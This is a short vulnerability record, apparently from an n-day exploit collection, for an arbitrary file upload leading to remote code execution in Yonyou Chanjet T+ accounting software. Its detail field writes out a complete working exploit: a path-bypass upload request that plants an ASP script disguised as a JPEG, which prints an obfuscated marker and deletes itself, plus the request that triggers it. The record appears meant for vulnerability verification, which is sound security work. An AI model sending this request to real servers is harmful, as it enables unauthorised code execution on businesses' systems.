vendor = "用友"
name = "用友 畅捷通T+ FileUploadHandler任意文件上传"
type = "RCE"
version = "未知"
path = "/tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login"
detail = "POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.2527.28 Safari/537.36 Content-Length: 554 Connection: close Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6 Accept-Encoding: gzip --f95ec6be8c3acff8e3edd3d910d3b9a6 Content-Disposition: form-data; name=\"file\"; filename=\"123.asp\" Content-Type: image/jpeg <% Response.Write chr(101)&chr(49)&chr(54)&chr(53)&chr(52)&chr(50)&chr(49)&chr(49)&chr(49)&chr(48)&chr(98)&chr(97)&chr(48)&chr(51)&chr(48)&chr(57)&chr(57)&chr(97)&chr(49)&chr(99)&chr(48)&chr(51)&chr(57)&chr(51)&chr(51)&chr(55)&chr(51)&chr(99)&chr(53)&chr(98)&chr(52)&chr(51) CreateObject(\"Scripting.FileSystemObject\").DeleteFile(server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))) %> --f95ec6be8c3acff8e3edd3d910d3b9a6-- GET /tplus/Userfiles/123.asp HTTP/1.1"
fix = "使用WAF封禁该地址"
date = "0702"
label = "nday"
verifier = "AdySec"
